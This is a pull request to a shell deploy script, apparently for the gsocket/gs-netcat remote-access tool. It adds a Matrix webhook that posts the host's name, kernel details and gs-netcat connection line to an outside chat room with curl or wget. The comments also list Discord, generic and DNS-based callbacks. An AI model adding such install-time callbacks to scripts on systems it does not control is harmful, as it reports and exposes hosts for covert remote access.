### PR TITLE
Beta - Add: Matrix webhook support

### DIFF
--- a/deploy/deploy.sh
+++ b/deploy/deploy.sh
@@ -204,8 +204,8 @@ msg='$(hostname) --- $(uname -rom) --- ${GS_HOST:+GS_HOST=${GS_HOST} }gs-netcat 
     [[ -z $GS_MTX_HOME ]] && [[ $GS_MTX_ROOMID =~ : ]] && GS_MTX_HOME="${GS_MTX_ROOMID#*:}"
     GS_MTX_ROOMID="${GS_MTX_ROOMID//\!/%21}"
     data='{"msgtype": "m.text", "body": "'"${msg}"'"}'
-    GS_WEBHOOK_CURL=('-H' 'Content-Type: application/json' '-H' 'Authorization: Bearer ${MTX_TOKEN}' '-d' "${data}" "https://${GS_MTX_HOME}/_matrix/client/r0/rooms/${GS_MTX_ROOMID}/send/m.room.message")
-    GS_WEBHOOK_WGET=('-H' 'Content-Type: application/json' '--header=Authorization: Bearer ${MTX_TOKEN}' "--post-data=${data}" "https://${GS_MTX_HOME}/_matrix/client/r0/rooms/${GS_MTX_ROOMID}/send/m.room.message")
+    GS_WEBHOOK_CURL=('-H' 'Content-Type: application/json' '-H' 'Authorization: Bearer ${GS_MTX_TOKEN}' '-d' "${data}" "https://${GS_MTX_HOME}/_matrix/client/r0/rooms/${GS_MTX_ROOMID}/send/m.room.message")
+    GS_WEBHOOK_WGET=('-H' 'Content-Type: application/json' '--header=Authorization: Bearer ${GS_MTX_TOKEN}' "--post-data=${data}" "https://${GS_MTX_HOME}/_matrix/client/r0/rooms/${GS_MTX_ROOMID}/send/m.room.message")
 }
 unset data msg
 

--- a/deploy/deploy.sh
+++ b/deploy/deploy.sh
@@ -87,6 +87,12 @@
 #       - Generic webhook, ="https://foo.blah/log.php?s=\${GS_SECRET}"
 # GS_DNSHOOK=<domain name>
 #       - Request <SECRET>.<domain-name>. See https://app.interactsh.com
+# GS_MTX_TOKEN=
+#       - Matrix Token, ="mat_..."
+# GS_MTX_ROOMID=
+#       - Matrix Room ID, ='!qr...'
+# GS_MTX_HOME=
+#       - Matrix home server, ="matrix.org"
 # GS_HOST=
 #       - IP or HOSTNAME of the GSRN-Server. Default is to use THC's infrastructure.
 #       - See https://github.com/hackerschoice/gsocket-relay
@@ -188,6 +194,18 @@ msg='$(hostname) --- $(uname -rom) --- ${GS_HOST:+GS_HOST=${GS_HOST} }gs-netcat 
 	data='{"username": "gsocket", "content": "'"${msg}"'"}'
 	GS_WEBHOOK_CURL=('-H' 'Content-Type: application/json' '-d' "${data}" "https://discord.com/api/webhooks/${GS_DISCORD_KEY}")
 	GS_WEBHOOK_WGET=('--header=Content-Type: application/json' "--post-data=${data}" "https://discord.com/api/webhooks/${GS_DISCORD_KEY}")
+}
+### Matrix
+# GS_MTX_TOKEN="mat_8KI...."
+# GS_MTX_ROOMID="!Ekq...JiQs:matrix.org"
+[[ -n $GS_MTX_TOKEN ]] && [[ -n $GS_MTX_ROOMID ]] && {
+    # GS_MTX_HOME could be specified through GS_MTX_ROOMID (e.g., !Ekq...JiQs:matrix.org)
+    # May fail if user use custom homeserver without specifying GS_MTX_HOME
+    [[ -z $GS_MTX_HOME ]] && [[ $GS_MTX_ROOMID =~ : ]] && GS_MTX_HOME="${GS_MTX_ROOMID#*:}"
+    GS_MTX_ROOMID="${GS_MTX_ROOMID//\!/%21}"
+    data='{"msgtype": "m.text", "body": "'"${msg}"'"}'
+    GS_WEBHOOK_CURL=('-H' 'Content-Type: application/json' '-H' 'Authorization: Bearer ${MTX_TOKEN}' '-d' "${data}" "https://${GS_MTX_HOME}/_matrix/client/r0/rooms/${GS_MTX_ROOMID}/send/m.room.message")
+    GS_WEBHOOK_WGET=('-H' 'Content-Type: application/json' '--header=Authorization: Bearer ${MTX_TOKEN}' "--post-data=${data}" "https://${GS_MTX_HOME}/_matrix/client/r0/rooms/${GS_MTX_ROOMID}/send/m.room.message")
 }
 unset data msg
 


### PR DESCRIPTION
This add support for Matrix webhook.
Add `GS_MTX_TOKEN`, `GS_MTX_ROOMID` and `GS_MTX_HOME`.

`GS_MTX_HOME` is only necessary if the homeserver address is not the same as the hostname (e.g. `catgirl.cloud -> matrix.catgirl.cloud`)